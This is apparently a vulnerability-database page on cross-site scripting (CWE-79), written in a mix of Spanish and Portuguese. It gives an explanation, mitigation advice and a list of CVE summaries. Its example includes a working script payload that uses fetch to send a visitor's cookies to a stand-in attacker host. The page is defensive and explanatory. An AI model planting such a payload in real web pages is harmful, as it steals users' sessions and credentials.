Fallos del tipo CWE-79

28.993 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-24642—Scroll Baner <= 1.0 - CSRF to RCEEPSS 0.6%CVE-2022-44875MEDIUMKioWare through 8.33 on Windows sets KioScriptingUrlACL.AclActions.AllowHigh for the about:blank origin, which allows attackers to obtain SYEPSS 0.6%CVE-2025-25620MEDIUMUnifiedtransform 2.0 is vulnerable to Cross Site Scripting (XSS) in the Create assignment function.EPSS 0.6%CVE-2024-1519MEDIUMPaid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress <= 4.14.4 - Unauthenticated Stored Cross-Site ScriptingEPSS 0.6%CVE-2024-3550MEDIUMWP Shortcodes Plugin — Shortcodes Ultimate <= 7.1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via ShortcodeEPSS 0.6%CVE-2023-2077LOWCampcodes Online Traffic Offense Management System view_details.php cross site scriptingEPSS 0.6%CVE-2024-26128MEDIUMbaserCMS Cross-site Scripting vulnerability in Content ManagementEPSS 0.6%CVE-2022-29444MEDIUMWordPress Breeze plugin <= 2.0.2 - Plugin Settings Change leading to Cross-Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2020-21058MEDIUMCross Site Scripting vulnerability in Typora v.0.9.79 allows a remote attacker to execute arbitrary code via the mermaid sytax.EPSS 0.6%CVE-2022-25611MEDIUMWordPress Simple Event Planner plugin <= 1.5.4 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2021-36867MEDIUMWordPress Psychological tests & quizzes plugin <= 0.21.19 - Authenticated Stored Cross-Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2026-5385HIGHGLPI 11.0.0 - Stored XSS in knowledge baseEPSS 0.6%CVE-2023-3815LOWy_project RuoYi File Upload uploadFilesPath cross site scriptingEPSS 0.6%CVE-2024-1103LOWCodeAstro Real Estate Management System Feedback Form profile.php cross site scriptingEPSS 0.6%CVE-2023-48302LOWNextcloud Server vulnerable to Self XSS when pasting HTML into Text app with Ctrl+Shift+VEPSS 0.6%CVE-2022-29433MEDIUMhttps://patchstack.com/database/vulnerability/nd-donations/wordpress-donations-plugin-1-8-authenticated-stored-cross-site-scripting-xss-vulnerabilityEPSS 0.6%CVE-2022-25613MEDIUMWordPress FV Flowplayer Video Player plugin <= 7.5.18.727 - Authenticated Persistent Cross-Site Scripting (XSS) vulnerabilityEPSS 0.6%CVE-2021-38482HIGHInHand Networks IR615 RouterEPSS 0.6%CVE-2025-27867MEDIUMApache Felix HTTP Webconsole Plugin: XSS in HTTP Webconsole PluginEPSS 0.6%CVE-2023-28679MEDIUMJenkins Mashup Portlets Plugin 1.1.2 and earlier provides the "Generic JS Portlet" feature that lets a user populate a portlet using a custoEPSS 0.6%